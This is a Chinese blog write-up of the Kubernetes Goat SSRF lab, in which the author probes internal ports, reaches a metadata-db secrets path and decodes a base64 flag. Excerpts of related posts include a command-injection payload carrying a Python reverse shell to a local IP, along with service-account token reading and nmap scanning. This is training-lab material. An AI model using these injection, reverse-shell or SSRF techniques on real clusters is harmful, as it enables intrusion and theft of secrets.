Kubernetes Goat 03 - SSRF in the Kubernetes (K8S) world
发表于|更新于|Kubernetes安全
|浏览量:
SSRF in the Kubernetes (K8S) world
- SSRF 可以使用bp抓包爆破判断端口号
- 找到5000端口
- 根据回显继续访问
- 找到新的路径
- 继续往下拼接
- 就这样以此类推
1 | http://metadata-db/latest/secrets/kubernetes-goat |
- 解密
1 | azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI= |
1 | k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab |
文章作者: putdown
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Putdownd’s Blog!
相关推荐
2023-10-31
Kubernetes Goat 16 - RBAC least privileges misconfiguration
RBAC least privileges misconfigurationRBAC 最低特权配置错误 由于Kubernetes默认情况下将所有secrets、tokens和service accounts信息都存储在一个固定的目录。直接访问这个目录,查找敏感的信息: 1cd /var/run/secrets/kubernetes.io/serviceaccount/ 要指向内部 API 服务器主机名,我们可以从环境变量中导出它 1export APISERVER=https://${KUBERNETES_SERVICE_HOST} 设置 ServiceAccount 令牌的路径 1export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount 设置命名空间值 1export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace) 读取 ServiceAccount token 1export TOKEN=$...
2023-10-30
Kubernetes Goat 08 & 09 & 10
08:NodePort exposed servicesNodePort 暴露的服务12345nmap 192.168.72.129 -sT -p30000-32767PORT STATE SERVICE30003/tcp open amicon-fpsu-ra 09:Helm v2 tiller to PwN the clusterHelm v2 tiller 风险 此方案已被弃用,供学习参考,环境默认是 Helm v3版本,可以安装Helm v2版本来实验 10:Analyzing crypto miner container分析被部署挖矿软件的容器镜像 查看工作任务详情 1kubectl describe job batch-check-job 获取Pod信息 1kubectl get pods --namespace default -l "job-name=batch-check-job" 获取pod信息manifest并分析 1kubectl get pod batch-check-job-gpfq4 -o yaml...
2023-10-28
Kubernetes Goat 05 - Docker CIS benchmarks analysis
Docker CIS benchmarks analysisDocker CIS 基线分析 首先需要部署docker bench security将它启动为DaemonSet 1cd kubernetes-goat/ 1kubectl apply -f scenarios/docker-bench-security/deployment.yaml 运行容器应用 1kubectl get pod 1kubectl exec -it docker-bench-security-6npjf -- sh 等待结果就好了 结束
2023-10-26
k8s-环境搭建
搭建环境 虚拟机:Ubuntu 22.04 虚拟机配置4C/4G 使用minikube搭建 配置proxychains ;在下面wget curl等下载文件时不能正常下载时使用 参考 https://icybersec.gitbook.io/cybersecuritynote/yun-wei-pei-zhi/kubernetes/an-zhuang-bu-shu#an-zhuang-minikube https://blog.csdn.net/QiVictory/article/details/119535043 开始搭建安装docker1apt install -y docker.io go语言环境-编译cri-dockerd的go版本要大于1.9.1 第一种,官方,执行./installer_linux报错的话建议第二种, 1234wget https://storage.googleapis.com/golang/getgo/installer_linuxchmod +x ./installer_linux./installer_linuxsource ~...
2023-10-30
Kubernetes Goat 11 - Kubernetes namespaces bypass
Kubernetes namespaces bypassKubernetes 命名空间绕过 运行hacker-container镜像 1kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh 报错的话运行这一条 1kubectl run -it hacker-container-2 --image=madhuakula/hacker-container -- sh 查看ip 寻找redis 1nmap -sT -open -p 6379 10.244.0.0/16 连接redis 1redis-cli -h 10.244.0.7 集群内还有许多其他的服务和资源,比如ElasticSearch,Mongo等等
2023-10-27
Kubernetes Goat 02 - docker in docker
Kubernetes Goat 02 - docker in docker 靶机ip:http://192.168.72.129:1231/ 能执行ping命令 职业习惯加个管道符 反弹shell 尝试使用bash来反弹没有成功 使用python反弹执行成功 监听 执行命令 1192.168.88.43 | python -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.88.43",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' 判断环境 ls -la mount docker in docker “Docker in Docker” (DinD) 是一种在 Docker 容器内部运行 Docker 的实践方法。它允许您在一个容器中运行和管理 Docker 容器,而无需在宿主机上安装 Docker。 doc...